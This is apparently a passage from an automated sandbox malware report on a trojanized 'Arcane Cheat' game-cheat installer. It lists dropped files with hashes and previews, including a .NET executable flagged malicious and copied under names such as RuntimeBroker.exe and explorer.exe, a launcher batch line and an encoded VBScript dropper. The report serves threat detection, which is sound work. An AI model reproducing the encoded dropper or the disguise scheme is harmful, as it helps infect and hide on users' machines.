                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:InnoSetup Log Arcane Cheat {1abcb2b3-469c-4b18-82f8-f208926ef299}, version 0x418, 37183 bytes, 960781\37\user\376, C:\Program Files (x86)\Arcane Cheat\376\37
                                Category:dropped
                                Size (bytes):37183
                                Entropy (8bit):3.4135046145445984
                                Encrypted:false
                                SSDEEP:192:W4LkT6lP1gwf1w121HPHGsArY1pMYosZ9HI:W4M6x+4vHGr6MYNHI
                                MD5:71FEB977FFAC7DC8F51481CD3EF49CFE
                                SHA1:A9153E38DDADF5E4362A24AC362B101674A643CD
                                SHA-256:03FCF6500DC644852E8C6E30B96B130554DD70DB6004841BD19C3E80CE3C3C2D
                                SHA-512:8EC4A5215479CFAAFF84302B9A656EC8691882FF5E9926F05127D21AD0E5809B8D7D5831D014095F635F896B1C964D4F809923F5D3A631D7D158C099647AAA2A
                                Malicious:false
                                Preview:Inno Setup Uninstall Log (b)....................................{1abcb2b3-469c-4b18-82f8-f208926ef299}..........................................................................................Arcane Cheat............................................................................................................................?...%...............................................................................................................a.q..........a................9.6.0.7.8.1......j.o.n.e.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t....................*.. ........................C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t..~...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.A.r.c.a.n.e. .C.h.e.a.t......A.r.c.a.n.e. .C.h.e.a.t......e.n.g.l.i.s.h.............L........C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.................C.:.\.P.r.o.g.r.

                                C:\Program Files (x86)\Arcane Cheat\unins000.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1197769
                                Entropy (8bit):6.370122940595945
                                Encrypted:false
                                SSDEEP:24576:eEZXjiinrzY5tO+uKE3LMT0jECZQEbLBDBEnFWsyb7xyxe:DdmbjTKlD00R5
                                MD5:4814AD2A8419A2C574930F6D70B6F76F
                                SHA1:DD09A6C66B6AE9F3194BE22A13FD353F020D809F
                                SHA-256:D51C94FA83722B0DD27869ECF539DA3E4A9DC4D6C30B01CCD6A2F37C632F17E2
                                SHA-512:4DAE11B817CA9529859E2A15DE0A8B7C7B3CC6A5572026A3C707505938F3374ACF522EC925EFBE0782CCB325BC6683E1111A21FDB1E21CB7C4FD6BE9323D784A
                                Malicious:false
                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......U..........................................@..............................................@..............................,8... ..............................................................................|................................text...$........................... ..`.itext.. ........................... ..`.data...<0.......2..................@....bss.....a...P...........................idata..,8.......:..................@....tls....<............X...................rdata...............X..............@..@.rsrc........ .......Z..............@..@....................................@..@........................................................................................................................................

                                C:\Program Files\Uninstall Information\4f78d385fc35a0

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (876), with no line terminators
                                Category:dropped
                                Size (bytes):876
                                Entropy (8bit):5.8980160910325115
                                Encrypted:false
                                SSDEEP:24:ARM+73l29eiDI5jDFhAteStFSVJKMtAbqHw6G2+:U709TWD5St4HKiA+Q6m
                                MD5:30171A5298B350B8C2839982AFDD5C7C
                                SHA1:2B52373ECE3734BE3E0DD4ACC9C5E2B7E93573BC
                                SHA-256:B05088755A21698AB63371B3A1FA17AE7403822551F672FF5183BF43E00A4BE8
                                SHA-512:37E8692EA0B1CB09BE4809FACDA0BF1C689F6F5E9B63B2879ACCB5F78402C7217AE80ABA7118FF967C7B3CE48572CDA1929F0B5C44E9E5AA0A8FC3D96C7C67D7
                                Malicious:false
                                Preview:bFyEgzElOYMvk23lYEWSjGBhBWZqvwQeiOsxVlSjxMads14XTGmLGcSVERDKZY0cIsNWKFPwvweXpizJbCWpKEYF5WtEiIKZW8UAoiNN0zZT75qfb3tXBKRETHayWLOnmFAqNyf3zIyUoEHApNmpZxXLqQqhIY1plwr249SnXzi2V7ZP9ZIIiiOzrzA6I8uaRJt2XPGq59SjPezt1bhtPtHDi2KF9VeZFHlMOg1uTcNiQojM9QFraBLiBqUfEAqje2dH3mfUjxawfiw3S8GsQx8E6DLhMWpSwnDXLcTWvvInlYCd3aMG47Tr4ZLzb7HMHHA1eYs0ot7fpUchArowKiXyUWdvQd4xn5gdYK8esWbKAyCj7nytTVCiuLhI57jLzJ1ty9J0tJDxGMyfU3ymoKeR37sMn0ivwQV06Tv8e8AJSObiXByCJ7gopjz1Q6M3kSB018iAHzHqKV9pfKylCgmzuqKXe4rhvHi9NlrZcx4Tz0eUjJVFIk1EpLFKxLgNIk4Cw9c4dZJOlTA4L0xUimZLQdUBggmQQrKO5bhjqbmsbmdWLK96YLogKtwTpbX7x274Iv8tSNoHAqtnA70Vhp2ECoEMoO4PDo5joiOZMPoKhggd9JSrkCaH921drvEETYEVuJ8btbIRAshfIkMf5MoAOxjvrusaKk0JcKszK18J4IHRVWUGijIHuDG7kMu9ssHa1XD71WUENeGGqSaVZl1kctZYDvP8H9bLAqa7SWOLOD3P7AQSwZjG0g8I8o3GHW7OD4FA1cCCWpWYzJaDf7LrZUVdrS8odIE2FoLC4QaUWgtKKjSyN0lJLPztjlSjdYjOleTK8XIOh1V2kKTI9Kamh4qzzbdS70087fjqQI0z

                                C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arcane Cheat\Arcane Cheat.lnk

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun May 26 07:02:28 2024, mtime=Sun May 26 07:02:28 2024, atime=Mon May 20 03:42:10 2024, length=32768, window=hide
                                Category:dropped
                                Size (bytes):1146
                                Entropy (8bit):4.6016896204196245
                                Encrypted:false
                                SSDEEP:24:8m1GELdOEm7KWqcPAuDgFRwd9YUd9oUUx80C0VqyFm:8m15LdOD2u0RwdrdX23syF
                                MD5:F511BD3D70BE2CE2088466447C8892A5
                                SHA1:833F88377839F109C67CAED5D278A6394CD1936F
                                SHA-256:7D93DE6965888AD5FE0B4AF66924645AD0B91976495A189C4B4D48729A93F412
                                SHA-512:113A53A7049694514F6F2410ACA3B878720D8EC3C53F10E7D1670500FB6593A17094FE1D24837AAAB422177447C05E26BD21BE40FAE26A1E40C953FA96B11DCE
                                Malicious:false
                                Preview:L..................F.... ...W...C...W...C.....o.p................................P.O. .:i.....+00.../C:\.....................1......X<@..PROGRA~2.........O.I.X<@....................V.....c.'.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....b.1......XO@..ARCANE~1..J......XO@.XO@.........................9...A.r.c.a.n.e. .C.h.e.a.t.....n.2......XE% .ARCANE~1.EXE..R......XO@.XO@....i.........................A.r.c.a.n.e. .C.h.e.a.t...e.x.e.......c...............-.......b...........]g.<.....C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe..C.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.\.A.r.c.a.n.e. .C.h.e.a.t...e.x.e.#.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.........*................@Z|...K.J.........`.......X.......960781...........hT..CrF.f4... .55.J6....,.......hT..CrF.f4... .55.J6....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2

                                C:\Recovery\7a0fd90576e088

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (861), with no line terminators
                                Category:dropped
                                Size (bytes):861
                                Entropy (8bit):5.906597424475597
                                Encrypted:false
                                SSDEEP:24:HSKNCF6XGiQHpc6XiB2LrzM680kIgp3tfn:y4CFkT34L068qgp3tf
                                MD5:E3293DE211415A796503DEF0493BBBCC
                                SHA1:B63004D93FECD5609E2C38E3BD0D8B75D62F6061
                                SHA-256:0116E05D705A606F746E4D440ECD66F949DE3126A25571B520AF5AF70AA955BF
                                SHA-512:1210EFE06C1DAABE40A6264A70B96805EB08A63B56017AD0012BD9D3518F7A58D1BB3C1C5883D110BA75B8401A8411A7AC995D119813DCA843C7DD9392006D01
                                Malicious:false
                                Preview:beOEhgicdTMLoI2zrKrwHMHFl4ABIvCTxAVrmf9cPGWbPW9imfTNWotPWIdmfgUrQ2YnwLMLLPhB0p0O4bYmcz6JQFUeCW6swoLW8VwbTHCGGsZrROsEIrPb6OXq1sJyTzOMeePip7TVwzChqmMxo1kEYuat8Fkk7NwRdNMx9JYKY4oGMzAOfVJbOKxuEfkjXsXjDuDcaZyfdZpdGUhIFWFmEUDSactdiyxqhFCcwhxGho8yfTot8beBnuesruC8pU6om96BREWhi8EZWOxGx9fGUvCwkUvBezaNrTMgXnc4F6doqEVd76KqzzU06Ja6TUCsh1sCCRsKgkBXSYGf9REiptY29VjNMgku3uGyWSbpNAKOy6ihD57BQeDxdzDrrf7AAQdhRRIq0YUpjJDCwBKRjjeZrSVgPu8sCKNhdAQvwRK1JXOTwB4pUqbbvE086laGammZ5fjwvYeRYnPTEBuOzSXWtwwYKRzK0DahvyXQbI46MJDHyg441MRIOQqJtKldiTbUMsiPoewrYbJktoknX5TowSSeIOgRgaX2rs4G8oPWZjtwGGZEk8Fn9xh4ZDHZ7fL7ER2Ateptp7ONjgYCycqhUu34KAq4h0Y4XvszNZUGSW7CiUV3pElfynnTX70sxvMziTzxxiyZHkP8x1VzpxPcO3GuIYbQimShKHdOfhFGQMYNYpgglADAftlpNFpZHi0fRsxpXHUHrJLCe2Vd14oiiSBagxBZ2p9sV36p11Jep5SWhjLUtLiM3S69qWJkF4PBJdql6qlAvJ2m9p36mqqqHwyD669eriZuqRME3jYDkhauaTABdM7ZOi3Wono9rGSMuH6sczDCSmGkWEnm67Bfk

                                C:\Recovery\9e8d7a4ca61bd9

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):145
                                Entropy (8bit):5.6866900422055355
                                Encrypted:false
                                SSDEEP:3:SUOvrMYdMLnbAiAu9R1baUhh4F8XDrtlks0lX3EcArd:SUQwbguXc+RvtOs0lExrd
                                MD5:11EE9C9361D0F55125C5BD0AC2EAF92F
                                SHA1:B0F3D95B0814A7E2DCD23F826C76438A3BAA4704
                                SHA-256:41AD5433BE785C4F0F66B0D6B1364AEC353FFBE4988B32709A2D8F8821A8C164
                                SHA-512:9F4044FDA1133B41B247ABF5CAA85266FEF418936CCED91C96215879FD7D3D26E07FC356C3BE23E1EE8C39477127FECA9463A8D55E0625520A58013F02105F87
                                Malicious:false
                                Preview:dgNqWb7OqIFEnQeCeobbVWkkvLgxiiauvsBAKctA8GxfuYKL3GhwKXwG6n5K4JpHrVT4Pe1C5bdOiFzXBV3cAnjX54DhgiFybqxZFP6YOf1t4hi1xiJjQNHEv59UaUfXVpx2RaRwZeNev0dXW

                                C:\Recovery\RuntimeBroker.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Recovery\explorer.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Surrogateprovidercomponentsessionmonitor\4f78d385fc35a0

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (519), with no line terminators
                                Category:dropped
                                Size (bytes):519
                                Entropy (8bit):5.8757528514391515
                                Encrypted:false
                                SSDEEP:12:aCEwHgOOO/hIu1X/VKUIZgVLD8/LnmmQ0GXXR1kT8lE:aAOO/hIu1XsUIZugnmr3E8lE
                                MD5:64B274861D8AB080E98C873F54BF6643
                                SHA1:971335A8AB37C8315FB9887ED4280E978BB319E7
                                SHA-256:5E370829C64D9120C93945CED676639EBB4DC51678058A2FABAFF190DA414A10
                                SHA-512:616064F4519CD3448732AEA0D0320175ABB8EC30B51D996CBF5A476F583144CBA3325C7088BE35AFFC333ABDCF8336BC6B513ED65DFD5259505E98660F58C19B
                                Malicious:false
                                Preview:J74xbjtXATuvxlXHipLB8s4prWfw1tysS4xW6AuCvN5RGK9QxCK5LuhaDPFED7fRfCc3yAKi5IPuxmihXO9yi2hiWXTr4p9yrnwErFcw1lACfxmariry8rtne4gaqdoPJbCJ0dzRvM661eDju39V7K0A3JkxjBGY7v2DudjOtaDvuxv917qxdSR9lBPr3CstGi8Gl9yRTvmhHEQGXk6lVS4od3csN2VqsTpLypY1IZesqu2gvJTSFGYxoUmsgFDaa5zyZFRsMEc5yL8tB57DjCll41heDpUDVDSu4EHq1lGBnc9cV2rlI91XUN3hhxoguZju3Nz6yRM86k7b2EIK8t4WM4ZrKkIE6jQO2OjHDuw0x2buPbocodiAeNh8yIvNJHBWTtjnfBHO6EiTdpbt5pacBQtprlT58jrq1Ebg2B7mWUEapOeIqCSdrjVDA364rMPXX2cZO513sxFrLTAdGKO6QN9SsYf8FC5KEqCwvF4vLYv3do1q3dyg7TGJ3KqzZ2yp25m

                                C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):63
                                Entropy (8bit):4.17923012413732
                                Encrypted:false
                                SSDEEP:3:I5nX6Aj2AjcMbKTGJH:Itug+wH
                                MD5:6DE687CF7CA366429C953CB49905B70A
                                SHA1:58E2C1823C038D8DA8A2F042672027184066279E
                                SHA-256:80D02A1CB8E68FFBC609A6C4914600604153CE929D46994200F837D354A5A611
                                SHA-512:6BFA7A07D6ADF167458CECE0BA3A110479EE7677FEB58C0AE9BA5C8913BCDDA13664060CE0261ABC1668C18831D5C73F6BC570BE8595323D46704B810FC024EF
                                Malicious:false
                                Preview:"C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"

                                C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Surrogateprovidercomponentsessionmonitor\fd168b19609dff

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (951), with no line terminators
                                Category:dropped
                                Size (bytes):951
                                Entropy (8bit):5.900282104754012
                                Encrypted:false
                                SSDEEP:24:qfx8x37SJK3nN566k4KNB3o0Ep7aUSU2L1LA1UVv7cl:DlOJON566kp6XxaUSUe101UCl
                                MD5:6E888483AE58D680A742046C8F2D7108
                                SHA1:12A3321C1466D72C4E7E04E25CB4D0AC2D18FDE5
                                SHA-256:70584B50B66250BCF7CB84DDE7B82128FFFCF2AF5A87FB6ED08681E4A6134359
                                SHA-512:F542A5CB0B33A1720CC01699392E541F8B6AE557F737A215A374B2210DB48C95EA1F3DF3278021603EC1835560B1A8AF94C10404D090A294AE80FA2AAF87C0D8
                                Malicious:false
                                Preview:qqxdUg4zQqAW5Elm11Tk4LSX53SFAxQhBAy23xxT51F6TiAExpTs9XCfXahbOzzdZcV5PstDE9oDFWDW2OSUeihn8TfcPVFGCmh0NEyE5PoAs8ZBWKi9he805r76NQxs3iAdzNJyZNYP4h594dGFwGjhnq5fH21ob5GJ86MJBukTFt6Xv8CuKs6x9czISnqhWux8bvA7Q7DCgPc4thuJ0Hes9SKfGD0XDC7V686A7EdNo3RtA5Zv3hqPPE9Ilf0NGq8dSG7vktLwnREFBaeLnFdgWsF18yZbNPG85yb37oKJV4l8A4HKApjBMbGkBGwwUtiYKFJM8kN95TKbGG1ErObhqFvdr1212YzlVNy4u4LZbkF2Rod4OrEGSBrFUqeHsWHheiG3S6UwCBFG92MCY8mKTsTUfskEZErFciXtiklRXSDR5lFbdcstt6OwPvXjWQX7TAnbedexXUwAoBZ4nJk7W8VfUldwMB5H5G757o6A74VYKNHNWc6NpZlVoHG39rlWZpFiEd68Mj9bm6VHeQZtErbfemQzhDAQT99eHiJ2f7AFZKsrv9YtR1RsOkDbNHbJitHm7196GgOGqVGU3iDioR8csQQhfrpYg1gqCGt49cmunKB2dshoD2eRuo4qlcaZ1zjzzaRxzJjMpNzhOXDwJBVoWP5YMCTgBM3xkMDDauz3TSlgyWbNZoP0d5cje3kw0CLcUB7CU9VZLbVEoYj0kFHX7CTptdjhJCDQHIMwYZ2ZS0oCkY5GUuLu5xfRsSS0ayPIYE7fMwbLMrEHYREVicNZ1SVTn4EGGB8dlfofba4hTAhNsX3aN7S7l0RFtn1RrUEKslg2nj4HipF1vIkPAo3JtB2uOiwxim085WeH1AwoCKZ6uaUkDmQCb5brsvoEwHj6yG5YodXA1OGil69yOLu6VxhA4wZGWr15ldHoe56jOQLMy3G

                                C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):241
                                Entropy (8bit):5.8687217902575695
                                Encrypted:false
                                SSDEEP:6:GogwqK+NkLzWbHa/818nZNDd3RL1wQJRXRg6Fdhm0SR/DGkM:GyMCzWLaG4d3XBJpC6nOnM
                                MD5:3944FF0B2B8A1617F5E571EBC259A0E6
                                SHA1:17137E6CCD0437ADECB866E9B44F94CEBBBDD878
                                SHA-256:693C79DBD630E1180DDB96B8D51895A9F27A01AE25C27AEBBC55BE5E4874335D
                                SHA-512:0E76C530E8739F559989E3657ED06A91D121BA37DC18D15C2FECA9AC986BAD1ADCFC6E86D54B097483F08C8BFD890079280C46029F71707C02D02AF96D767B03
                                Malicious:false
                                Preview:#@~^2AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ?;MDKolD+a.W7k[+MmGhaWx.UYk+/krGxsW.kOW.&(L.N4i0It/{;|y2[;Cnn7..9 (lDJ~,!B~0mVd++kcAAA==^#~@.

                                C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe

                                Download File
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\Public\Desktop\Arcane Cheat.lnk

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun May 26 07:02:28 2024, mtime=Sun May 26 07:02:47 2024, atime=Mon May 20 03:42:10 2024, length=32768, window=hide
                                Category:dropped
                                Size (bytes):1128
                                Entropy (8bit):4.604940247980804
                                Encrypted:false
                                SSDEEP:24:8mHLE7bdOE57KWqcPAuDgRd9YUd9oUUx80C0VqyFm:8mHoXdOs2uYdrdX23syF
                                MD5:885766DF07146400BB5190D5E2E56331
                                SHA1:1F24BC1E4B43D4097BDC1221C79914C2BEEDC55E
                                SHA-256:C43A44555EE43AA3FED11EE6874D7B57F788FF2654708BAE87CFE332D452E724
                                SHA-512:880AE5C71B565DA84D8D1E3129F7ECEDB76ACC36C4E6BADD80344FA5A197D8664247839AF9AFEFF2EF4EABAC97597323DCF8263689CFE60E610F879807ECCB47
                                Malicious:false
                                Preview:L..................F.... ...W...C...G...C.....o.p................................P.O. .:i.....+00.../C:\.....................1......XO@..PROGRA~2.........O.I.XX@....................V......;..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....b.1......XX@..ARCANE~1..J......XO@.XX@.........................W...A.r.c.a.n.e. .C.h.e.a.t.....n.2......XE% .ARCANE~1.EXE..R......XO@.XO@....i.........................A.r.c.a.n.e. .C.h.e.a.t...e.x.e.......c...............-.......b...........]g.<.....C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe..:.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.\.A.r.c.a.n.e. .C.h.e.a.t...e.x.e.#.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.r.c.a.n.e. .C.h.e.a.t.........*................@Z|...K.J.........`.......X.......960781...........hT..CrF.f4... .55.J6....,.......hT..CrF.f4... .55.J6....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\audiodg.exe.log

                                Download File
                                Process:C:\Windows\addins\audiodg.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):1281
                                Entropy (8bit):5.370111951859942
                                Encrypted:false
                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                Malicious:false
